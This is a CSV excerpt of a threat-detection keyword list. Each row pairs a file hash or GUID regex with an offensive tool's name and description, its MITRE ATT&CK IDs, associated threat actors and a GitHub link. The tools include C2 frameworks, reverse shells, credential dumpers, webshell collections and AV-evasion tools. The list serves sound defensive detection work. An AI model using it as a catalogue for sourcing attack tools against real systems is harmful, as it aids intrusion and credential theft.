"*b79c2861d85b3c973152d22a7e43244c0fcb66394ceb91ab11606adbdff69e2b*",".{0,1000}b79c2861d85b3c973152d22a7e43244c0fcb66394ceb91ab11606adbdff69e2b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34942"
"*b7a5527f8a5f361fc787facc955937ea2294a883a63e5ad4abf1c9ed26b49ccd*",".{0,1000}b7a5527f8a5f361fc787facc955937ea2294a883a63e5ad4abf1c9ed26b49ccd.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","34943"
"*b7a9d9eff63ab4a330888d498d954e78cdc19b44435f26f6914aa4b2bbe86bbc*",".{0,1000}b7a9d9eff63ab4a330888d498d954e78cdc19b44435f26f6914aa4b2bbe86bbc.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","34946"
"*b7aac417714cff0bd0a03475b7ff00ccdf5480bc463c14d407b9ed8bc8ffcc02*",".{0,1000}b7aac417714cff0bd0a03475b7ff00ccdf5480bc463c14d407b9ed8bc8ffcc02.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","34947"
"*b7ac3213e10a169498f8e34b434aced491debb07d2e82c59c86f8c0c6581cf51*",".{0,1000}b7ac3213e10a169498f8e34b434aced491debb07d2e82c59c86f8c0c6581cf51.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","0","#filehash","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","34948"
"*b7ae4b58d31453da02817000dd7465ab68434f43e22d2b7a5ffc73f3fa65f6cd*",".{0,1000}b7ae4b58d31453da02817000dd7465ab68434f43e22d2b7a5ffc73f3fa65f6cd.{0,1000}","offensive_tool_keyword","ShadowHound","set of PowerShell scripts for Active Directory enumeration","T1087 - T1018 - T1482 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Friends-Security/ShadowHound","1","0","#filehash","N/A","8","4","345","36","2024-12-01T08:06:02Z","2024-11-21T15:01:14Z","34949"
"*b7b10a29015b41041519488dc632cd5b0b39358f56d388277d99304917be4a9d*",".{0,1000}b7b10a29015b41041519488dc632cd5b0b39358f56d388277d99304917be4a9d.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","#filehash","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","34950"
"*b7b5637287f143fe5e54c022e6c7b785141cfdeec2aceac263ee38e5ac17d3d7*",".{0,1000}b7b5637287f143fe5e54c022e6c7b785141cfdeec2aceac263ee38e5ac17d3d7.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#filehash #linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","34951"
"*b7b67e33ca53799aa1be6a7aa7677363b8a0e711091bccd2e49f501d5dc22de7*",".{0,1000}b7b67e33ca53799aa1be6a7aa7677363b8a0e711091bccd2e49f501d5dc22de7.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","#filehash","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","34952"
"*b7bb45d67e4db4c923cf5e62d0fc8c9ae23abfe214c8daa730d343b0d9205837*",".{0,1000}b7bb45d67e4db4c923cf5e62d0fc8c9ae23abfe214c8daa730d343b0d9205837.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","34954"
"*b7c4eb1c120f959166ad5477119adb92db8081c61193847287a13fec1e780b24*",".{0,1000}b7c4eb1c120f959166ad5477119adb92db8081c61193847287a13fec1e780b24.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34956"
"*B7C64002-5002-410F-868C-826073AFA924*",".{0,1000}B7C64002\-5002\-410F\-868C\-826073AFA924.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#GUIDproject","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","34958"
"*b7c6bdd822f8710858ed799df49b711001e35901e24ba1726b71987d83cf3e76*",".{0,1000}b7c6bdd822f8710858ed799df49b711001e35901e24ba1726b71987d83cf3e76.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34959"
"*b7c6d0220856790482d617170609b3fb76dfbcf7aaa97dac70767e7896151d86*",".{0,1000}b7c6d0220856790482d617170609b3fb76dfbcf7aaa97dac70767e7896151d86.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34960"
"*b7c7c4caafe06600e68c48eed104ea895a933df2076198e27707af00996c336f*",".{0,1000}b7c7c4caafe06600e68c48eed104ea895a933df2076198e27707af00996c336f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","34961"
"*b7d464d0d52a2c35760aa7cf90a90e1ea3513a8827b175aba5099a90dee416f9*",".{0,1000}b7d464d0d52a2c35760aa7cf90a90e1ea3513a8827b175aba5099a90dee416f9.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","#filehash","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","34963"
"*b7e50a98223c9a3008aed3617b5b9282a40b7ef60fc274734d3970c7f9add804*",".{0,1000}b7e50a98223c9a3008aed3617b5b9282a40b7ef60fc274734d3970c7f9add804.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34966"
"*b7eab05d2830689b6a72af875085366fc8116fec2c856c7dc5af728bd0b6b972*",".{0,1000}b7eab05d2830689b6a72af875085366fc8116fec2c856c7dc5af728bd0b6b972.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34967"
"*b7f00ce7576d810f2ccaa6d31767672e94e50e3ffec2eee2a2ff373aa651cf72*",".{0,1000}b7f00ce7576d810f2ccaa6d31767672e94e50e3ffec2eee2a2ff373aa651cf72.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34969"
"*b7f57aedc361258fea85dedd3713454983c561335cd9d2d8d9d072a0e7ac8c7d*",".{0,1000}b7f57aedc361258fea85dedd3713454983c561335cd9d2d8d9d072a0e7ac8c7d.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","34971"
"*b7f9eb0a95f3523aee8363c59e26a88bcf30d2160db862d4d167945ad342d777*",".{0,1000}b7f9eb0a95f3523aee8363c59e26a88bcf30d2160db862d4d167945ad342d777.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34972"
"*b7fa937e1b42914b6dee7a038520775e09532babd8c296a8e86db0faab66236c*",".{0,1000}b7fa937e1b42914b6dee7a038520775e09532babd8c296a8e86db0faab66236c.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","34973"
"*b7fb827ab82836232bdf3a6be19a1ebd3d5194dbff0b922b0ae39f8562c9822f*",".{0,1000}b7fb827ab82836232bdf3a6be19a1ebd3d5194dbff0b922b0ae39f8562c9822f.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","34974"
"*B7FF0EE8-6C68-46C6-AADB-58C0E3309FB2*",".{0,1000}B7FF0EE8\-6C68\-46C6\-AADB\-58C0E3309FB2.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","34975"
"*b80125fae6f888a941e421e929bf6837142d0bf30f13fe01c266f7dd05e904b0*",".{0,1000}b80125fae6f888a941e421e929bf6837142d0bf30f13fe01c266f7dd05e904b0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34977"
"*b809230b5259568f275760187a0eb5c2cd00a6ac859d92e685036c1dfb797f0d*",".{0,1000}b809230b5259568f275760187a0eb5c2cd00a6ac859d92e685036c1dfb797f0d.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","34978"
"*b80bb505227429df0b61a07d2ab57c02a48043fbd90d4680192b1698e9a2f37a*",".{0,1000}b80bb505227429df0b61a07d2ab57c02a48043fbd90d4680192b1698e9a2f37a.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","#filehash","N/A","8","10","4","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z","34979"
"*b80ee97a9c30291203d5a224dedc328b45a09ec4999ab562303ef93388e12c0a*",".{0,1000}b80ee97a9c30291203d5a224dedc328b45a09ec4999ab562303ef93388e12c0a.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34980"
"*b81fdf0e50bab32722ec97ff2193bbdbc086633104ea03cb00d3d32419f513ae*",".{0,1000}b81fdf0e50bab32722ec97ff2193bbdbc086633104ea03cb00d3d32419f513ae.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34983"
"*b8285e421d702738eab45670ecae439a7228994e7068b04cb51740e47efbfb41*",".{0,1000}b8285e421d702738eab45670ecae439a7228994e7068b04cb51740e47efbfb41.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","#filehash","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","34984"
"*b83141462b74d6d62282551eb34d139eb5c3071516f670af42c1dcc30d6547b2*",".{0,1000}b83141462b74d6d62282551eb34d139eb5c3071516f670af42c1dcc30d6547b2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34986"
"*b8328fa4f70b5252b4d5850b540953a7766483b7c710f4fef68186662849f040*",".{0,1000}b8328fa4f70b5252b4d5850b540953a7766483b7c710f4fef68186662849f040.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","34987"
"*b834cbb559fcc9f0dcea0b9303b2006f14d239964b87e6f37d44d5520b93ca0d*",".{0,1000}b834cbb559fcc9f0dcea0b9303b2006f14d239964b87e6f37d44d5520b93ca0d.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","34988"
"*b83bc4961b33aa3ec0399c801a97c2c47766462991ffa488a4cbaee1ab3e0bff*",".{0,1000}b83bc4961b33aa3ec0399c801a97c2c47766462991ffa488a4cbaee1ab3e0bff.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34990"
"*b83bd9409f469f3b094b81bdbf548e5449357ecd4c604d45f3ccd59c02e28a1e*",".{0,1000}b83bd9409f469f3b094b81bdbf548e5449357ecd4c604d45f3ccd59c02e28a1e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34991"
"*b83dc319987bebf9dca8b6e85671f9bdced13236275598a29e8669842a225bbb*",".{0,1000}b83dc319987bebf9dca8b6e85671f9bdced13236275598a29e8669842a225bbb.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","34992"
"*b83de77d08d842c68a940103588639cef6ab9f9fa12241311d9aed3690502af3*",".{0,1000}b83de77d08d842c68a940103588639cef6ab9f9fa12241311d9aed3690502af3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","34993"
"*b83ee6d62e5e159fa0a16fcad953862a1d567abc5c60aa35dc02aac7efc87870*",".{0,1000}b83ee6d62e5e159fa0a16fcad953862a1d567abc5c60aa35dc02aac7efc87870.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","https://www.virustotal.com/gui/file/b83ee6d62e5e159fa0a16fcad953862a1d567abc5c60aa35dc02aac7efc87870","10","10","N/A","N/A","N/A","N/A","34994"
"*b83ee6d62e5e159fa0a16fcad953862a1d567abc5c60aa35dc02aac7efc87870*",".{0,1000}b83ee6d62e5e159fa0a16fcad953862a1d567abc5c60aa35dc02aac7efc87870.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A","34995"
"*b847015c30b9a6cda3b856cc82ae840b50ca407a71db9d5a9785ef8073ded517*",".{0,1000}b847015c30b9a6cda3b856cc82ae840b50ca407a71db9d5a9785ef8073ded517.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","34996"
"*b84798b914f570f9b52bf3fe754c2559795aa6c3daa4c4344f4bce69f5f759d9*",".{0,1000}b84798b914f570f9b52bf3fe754c2559795aa6c3daa4c4344f4bce69f5f759d9.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","#filehash","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","34997"
"*b8480a3711130c5b2b71a873611a66a48edcadadbdb3309577d7aa943fa2a1e6*",".{0,1000}b8480a3711130c5b2b71a873611a66a48edcadadbdb3309577d7aa943fa2a1e6.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","34998"
"*B84EFDD8-CEA0-4CCA-B7B8-3F8AB3A336B4*",".{0,1000}B84EFDD8\-CEA0\-4CCA\-B7B8\-3F8AB3A336B4.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","34999"
"*b85083493e392d40d01bec390adba7e862fef08f3624839bbd9aa4f1b049fffc*",".{0,1000}b85083493e392d40d01bec390adba7e862fef08f3624839bbd9aa4f1b049fffc.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","35000"
"*b8531483419f4819584b69edee3089b86bab98a1c39d3058074499d76939cff5*",".{0,1000}b8531483419f4819584b69edee3089b86bab98a1c39d3058074499d76939cff5.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs -  detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","#filehash","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","35001"
"*b85ba959ef3133cc86ae808e0e8f58af054f00cc96b34ef6973f3942ee80d056*",".{0,1000}b85ba959ef3133cc86ae808e0e8f58af054f00cc96b34ef6973f3942ee80d056.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","35003"
"*b872e0bbe252aa4e33492453232f6320b8d35b536db2efbf9d50a1d4e5de14d7*",".{0,1000}b872e0bbe252aa4e33492453232f6320b8d35b536db2efbf9d50a1d4e5de14d7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35007"
"*b875051a6d584b37810ea48923af45e20d1367adfa94266bfe47a1a35d76b03a*",".{0,1000}b875051a6d584b37810ea48923af45e20d1367adfa94266bfe47a1a35d76b03a.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","#filehash","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","35008"
"*B87A5373-750C-44A7-BCEC-32185A3077AC*",".{0,1000}B87A5373\-750C\-44A7\-BCEC\-32185A3077AC.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35009"
